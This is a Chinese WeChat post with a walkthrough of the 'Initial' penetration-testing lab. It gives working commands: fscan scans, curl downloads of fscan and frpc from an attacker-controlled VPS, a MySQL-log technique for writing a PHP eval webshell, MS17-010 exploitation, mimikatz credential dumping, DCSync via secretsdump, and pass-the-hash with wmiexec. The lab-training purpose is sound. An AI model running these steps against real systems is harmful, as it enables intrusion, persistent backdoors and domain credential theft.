:声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关
现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!
靶场简介
获取入口机权限
通过fscan对目标ip进行扫描
./fscan_darwin -h 39.98.209.209
发现存在tp5 rce,通过工具成功一键利用
通过sudo提权获得flag01:flag{60b53231-
sudo -lsudo /usr/bin/mysql -e '! cat /root/flag/flag01.txt'
内网横向
使用fscan对当前c段进行扫描
curl http://39.98.170.21:8001/fscan_amd64 --output fscanchmod +x ./fscan./fscan -h 172.22.2.1/24
172.22.1.18:3306 open172.22.1.18:445 open172.22.1.21:445 open172.22.1.2:445 open172.22.1.18:139 open172.22.1.21:139 open172.22.1.2:139 open172.22.1.18:135 open172.22.1.21:135 open172.22.1.15:22 open172.22.1.2:135 open172.22.1.18:80 open172.22.1.2:88 open172.22.1.15:80 open[*]172.22.1.2[->]DC01[->]172.22.1.2[+] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)[*] NetInfo:[*]172.22.1.18[->]XIAORANG-OA01[->]172.22.1.18[*] NetInfo:[*]172.22.1.21[->]XIAORANG-WIN7[->]172.22.1.21[*] WebTitle: http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin[*] 172.22.1.2 (Windows Server 2016 Datacenter 14393)[*] NetBios: 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600[*] NetBios: 172.22.1.2 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393[*] NetBios: 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1[*] WebTitle: http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
frp内网穿透,进入目标内网
curl http://vpsip:8001/frpc --output frpccurl http://vpsip:8001/frpc.ini --output frpc.ininohup ./frpc -c frpc.ini
通过前面探测发现http://172.22.1.18为信呼OA,通过路径扫描发现存在phpmyadmin接口
该OA存在历史漏洞:https://blog.csdn.net/solitudi/article/details/118675321,只需要在该脚本同目录下创建一个php一句话木马即可:<?php eval($_GET["1"]);?>;
对phpadmin经过尝试发现可以通过root/root进行登录,这时候可以通过mysql日志写马的方式来getshell;
show variables like 'general%';查看是否开启日志以及存放的日志位置
开启日志并写入一句话木马
set global general_log = ON;开启日志set global general_log_file = "c:/phpStudy/PHPTutorial/www/1.php"select '<?php eval($_POST[shell]);?>'
通过蚁剑进行连接
在C:/Users/Administrator/flag/flag02.txt获得flag02
flag02:2ce3-4813-87d4-
172.22.1.21存在17010,通过利用工具添加用户test:test@123!,并将test用户添加到本地管理员组当中。
后续通过test用户rdp到用户桌面,使用mimikatz抓取lsass凭证,获取XIAORANG-WIN7$的hash
XIAORANG-WIN7$/d4df8a3fa73a9fee14a62123784290c6随后通过bloodhound分析后发现XIAORANG-WIN7$对域内拥有dcsync权限
通过XIAORANG-WIN7$的凭证进行dcsync
python3 secretsdump.py [email protected] -just-dc-user administrator -hashes :d4df8a3fa73a9fee14a62123784290c6
利用administrator的凭证对dc进行远程连接
python3 wmiexec.py xiaorang/[email protected] -hashes :10cf89a850fb1cdbe6bb432b859164c8
在dc上获取flag03:e8f88d0d43d6}
整个flag:flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}
关于我们
点击下方名片进入公众号,欢迎关注!
点个小赞你最好看
原文始发于微信公众号(猫蛋儿安全):春秋云镜-Initial-WriteUp
